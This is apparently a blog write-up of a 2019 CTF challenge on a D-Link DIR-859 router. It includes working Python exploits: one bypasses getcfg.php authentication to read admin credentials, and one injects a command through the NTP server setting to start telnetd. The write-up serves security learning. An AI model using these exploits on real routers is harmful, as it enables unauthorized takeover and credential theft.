QWB2019線下Real World-Router WP

原創 HuaSir_X 2019-06-18 03:28

0x00前言

今年強網杯線下只有PWN,Web狗覺得要來旅遊了,不過看到Real World部分上來發了個D-Link路由器,還是決定玩一下,畢竟畢設中玩了不少路由器還是有點經驗的。至於其他的題目,就只能看神仙打架了:P,膜手日Chrome、Qemu、各種CMS的大佬。

0x01題目

拿到一個D-Link DIR-859勁路由、串口調試設備和路由器固件。看到TTL轉USB設備先去焊了會板子但我也不會在線調試棧溢出,就去解壓固件了。注意這裏binwalk和firmware-mod-kit不能直接解壓,要先用dd切一下文件:

dd if=DIR859Ax_FW106b01_beta01_patch.bin of=DIR-859.img bs=1310868 skip=1
./unsquashfs_all.sh DIR-859.img

可以看到版本是B-1.06,而官網最新的固件型號是B-1.05,這兩個固件差不多,cgibin大小有點不同,考慮後面比對一下。題目要求是拿到路由器shell,打開telnet服務,並在/tmp目錄下面寫指定文件。

0x02初步分析

首先先去CVE搜一下,當然不出意外的是沒有CVE漏洞,題目中也說明了是主辦方挖出了漏洞,已經通報廠商,但是還沒有修補,但是現在看來其歷史漏洞也沒有。
打開路由器管理頁面,與DIR-8xxx系列一模一樣的界面撲面而來,除了換了版本固件號之外都一樣,COPYRIGHT也只是到2015。考慮用相近版本號的已知漏洞來測一下。
在這裏插入圖片描述

0x03漏洞利用

掏出之前DIR-868和DIR-817LW上用的exp,改一下先來讀一下賬密:

# -*- coding:utf-8 -*-
import requests, os
from lxml import etree
from traceback import print_exc
try:
    from urllib.parse import urljoin
except:
    from urlparse import urljoin
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
import re

url = 'http://192.168.0.1'
print("Exploit start...")
#########################get user and pass###########################
try:
    res = requests.post(urljoin(url,'/getcfg.php'),data={"SERVICES":"RUNTIME.WPS.WLAN-1","AUTHORIZED_GROUP":"1\n"})
    # print(res.content)
except:
    print("exploit fail...")
    print("you can try this command:")
    print("curl -k -d \"SERVICES=RUNTIME.WPS.WLAN-1&AUTHORIZED_GROUP=1%0a\" {}getcfg.php".format(url))
    print(os.system("curl -k -d \"SERVICES=RUNTIME.WPS.WLAN-1&AUTHORIZED_GROUP=1%0a\" {}getcfg.php".format(url)))
    exit()

if 'Not authorized' in res.content:
    print("authorize fail..")
    exit()
elif "BAD REQUEST" in res.content:
    print("BAD REQUEST, unsupported HTTP request")

try:
    name = re.findall("<name>(.*)</name>",res.content)
    passwd = re.findall("<password>(.*)</password>",res.content)
    print("name: %s\npasswd: %s\n"%(name[0],passwd[0]))
except:
    print("fail...")
    print(res.content)

區別是DIR-868/817LW是通過讀取DEVICE.ACCOUNT.xml.php文件來獲取賬密,DIR-859是要通過RUNTIME.WPS.WLAN-1.xml.php來獲取,尋找過程就是把所有文件全讀一遍再Ctrl+F就可以了。漏洞出現在POST傳入AUTHORIZED_GROUP=1\n可實現身份認證,通過getcfg.php讀取配置文件。
但是題目要求是要拿到shell,即還需要一個命令執行漏洞來開啓telnet服務,找相近型號路由器,發現了DIR-850L命令執行漏洞,其中漏洞存在於/etc/services/DEVICE.TIME.php

#/etc/services/DEVICE.TIME.php
   163	$enable = query("/device/time/ntp/enable");
   164	if($enable=="") $enable = 0;
   165	$enablev6 = query("/device/time/ntp6/enable");
   166	if($enablev6=="") $enablev6 = 0;
   167	$server = query("/device/time/ntp/server");
   ...
   172	if ($enable==1 && $enablev6==1)
   ...
   184				'SERVER4='.$server.'\n'.
   ...
   189				'	ntpclient -h $SERVER4 -i 5 -s -4 > /dev/console\n'.

其中$SERVER變量被拼接到了命令執行的字符串中,造成了命令注入。
下面的操作需要登陸,HNAP登陸過程有點小複雜,就沒寫,下面的腳本需要賬密登陸後把cookie填進去

# -*- coding:utf-8 -*-

import requests, os
from lxml import etree
from traceback import print_exc
try:
    from urllib.parse import urljoin
except:
    from urlparse import urljoin
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
import re

url = 'http://192.168.0.1/'
print("Exploit continuing...")
COMMAND = 'telnetd'
uid = 'b8gh3GJptw'         ###update it!!!!!
session = requests.Session()
session.verify = False
session.cookies.update({"uid": uid})
################get DEVICE.TIME###############################
try:
    res = session.post(urljoin(url,'/getcfg.php'),data={"SERVICES":"DEVICE.TIME","AUTHORIZED_GROUP":"1\n"})
    # print(res.content)
    tree = etree.fromstring(res.content)
    tree.xpath("//ntp/enable")[0].text = "1"
    tree.xpath("//ntp/server")[0].text = "metelesku; (" + COMMAND + ") & exit; "
    tree.xpath("//ntp6/enable")[0].text = "1"
    data = etree.tostring(tree)
    # print(data)
except:
    print_exc()
    pass
# exit()
#################POST hedwig.cgi###############################
print("hedwig")
headers = {"Content-Type": "text/xml"}
data = etree.tostring(tree)
resp = session.post(urljoin(url, "/hedwig.cgi"), headers=headers, data=data)
# print(resp.text)
tree = etree.fromstring(resp.content)
result = tree.findtext("result")
if result.lower() != "ok":
    print("Failed!")
    print(resp.text)
    sys.exit()
print("OK")
###############POST pigwidgeon.cgi##############################
print("pigwidgeon")
data = {"ACTIONS": "SETCFG,ACTIVATE"}
resp = session.post(urljoin(url, "/pigwidgeon.cgi"), data=data)
# print(resp.text)
tree = etree.fromstring(resp.content)
result = tree.findtext("result")
if result.lower() != "ok":
    print("Failed!")
    print(resp.text)
    exit()
print("OK")

這樣就打開了路由器的telnet服務,可以telnet 192.168.0.1登陸上去進行操作了。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

VirtIO drivers for Linux, Windows and etc.

Why do you need VirtIO driver? It's useful when you use Linux/Windows VMs in PVE. Usually when you attach a network to t

paceship9 2024-06-16 13:42:04

Linux 命令大放送!(第一輯)

涓涓細流,終匯大海。 在 "Shell 小技能" 一文中,講到了 Shell 組合 linux 命令的實用小技能。每一條 linux 命令,都是一個小工具。 Shell 可以將很多小工具組合成更強大的實用工具。 本文主要梳理程序員常用

琴水玉 2024-06-16 13:39:44

Windows開的熱點手機能連上但上不了網

什麼更新驅動,設置“允許共享...”,啓動幾個服務都沒用,對我有用的辦法是: 刪除註冊表鍵HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WlanSvc\Parameters\Ho

ahdung 2024-06-16 13:39:14

dotnet 簡單控制檯使用 KernelMemory 向量化文本嵌入生成和查詢

本文將和大家簡單介紹一下如何在控制檯裏面使用 Microsoft.KernelMemory 調用 TextEmbedding 對一些文本知識庫內容生成向量化信息,以及進行向量化查詢 本文屬於 SemanticKernel 入門系列博客,更多

indexi 2024-06-16 13:38:54

WPF 通過 SetWindowDisplayAffinity 配置禁止對窗口進行截圖或錄屏

有些應用程序比較機密或隱私,不期望被其他截圖軟件截圖到應用的窗口,或者被錄屏軟件錄製到。簡單的方法是通過 SetWindowDisplayAffinity 方法進行配置窗口阻止截圖軟件對其截圖 開始之前必須說明的是對抗截圖錄屏是一個矛和盾的

indexi 2024-06-16 13:38:54

Vue微前端架構與Qiankun實踐理論指南

title: Vue微前端架構與Qiankun實踐理論指南 date: 2024/6/15 updated: 2024/6/15 author: cmdragon excerpt: 這篇文章介紹了微前端架構概念,聚焦於如何在Vue.j

Mifen 2024-06-16 13:38:23

博客園商業化之路-衆包平臺:繼續召集早期合作開發者

會員、周邊、廣告是園子現在維持生存的主要收入來源,而衆包平臺是園子未來實現商業化規模增長的希望所在。 今年5月開始的衆包平臺建設是萬里長征,不僅需要融資,還需要找到合夥人組建新的團隊。雖然當前既沒有錢又沒人,但萬里長征已經邁出了第一步,採用

博客園團隊 2024-06-16 13:30:43

Linux內核版本以及部分參數與性能之二

Linux內核版本以及部分參數與性能之二 版本範圍 grubby --set-default /boot/vmlinuz-6.9.4-1.el7.elrepo.x86_64 grubby --set-default /boot/vmlin

濟南小老虎 2024-06-16 13:29:23

[轉帖]性能分析之TCP全連接隊列佔滿問題分析及優化過程

https://cloud.tencent.com/developer/article/1558493   前言 在對一個擋板系統進行測試時,遇到一個由於TCP全連接隊列被佔滿而影響系統性能的問題,這裏記錄下如何進行

濟南小老虎 2024-06-16 13:29:23

那些日子 九

其實有人可能會問,你怎麼挺多故事或者爲什麼看着你的文章總感覺你像一個真正處在巔峯時期的作者一樣文思泉湧呢? 你要知道的是,我也玩遊戲,還一度沉迷過當然別學我,如果現在讓我重新選擇,我會把玩遊戲的時間玩遊戲花的錢都用在投資自己上,或者做好健身

wizard_Q 2024-06-16 13:28:43

那些日子 十三

一週工作結束,打卡下班、跑步、回宿舍。 打開好友喜歡的音樂開始聽起來,其實對音樂我不是太懂,只知道有幾種分類,比如搖滾啊、流行音樂、說唱、R&B……從最早的流行歌曲開始聽,現在大概會唱的歌沒有一百也有幾十首吧,有些流行歌曲真的是讓人朗朗上口

wizard_Q 2024-06-16 13:28:33

那些日子 十

沒有網絡的世界,簡單純粹。 雖然我有買過一些電子書,但是實體書也是買過一些的,大部分是爲了找份好工作而買的專業類書籍,很少買閒書。 其實閒書也是看過一些的,比如《故事會》,還有一些有點忘記名字的刊物,都是父上看過的,儘管這些書裏面沒有太多富

wizard_Q 2024-06-16 13:28:33

那些日子 十二

我的記錄也不是太順序的,像軟件項目的不同開發方式,有瀑布式和敏捷式,而我的記錄大多時候是敏捷式,想到什麼記錄什麼。 前面大部分在記錄我的工作歷程,或者說是退伍後開始幹了些啥,說起退伍,應該是前天,在某信的視頻號刷到的做煎餅銷售的退伍小哥,我

wizard_Q 2024-06-16 13:28:33

根據項目用例圖用例點估算項目工時的方法

一共通過6個步驟: 計算未調整的角色權值UAW 計算未調整的用例權值UUCW 計算未調整的用例點UUCP 計算技術(TCF)和環境因子(ECF) -> TEF 計算調整的用例點UCP 計算工作量(man - hours)多少人多少工時

wizard_Q 2024-06-16 13:28:33

Linux下以從官網上下載的go1.22.3.linux-amd64.tar.gz創建Golang鏡像

關於go1.22.3.linux-amd64.tar.gz創建Golang鏡像 部份 1.首先從官網下載 https://golang.google.cn/dl/       go1.22.3.linux-amd64.tar.gz   2.

酒沉吟 2024-06-16 13:25:12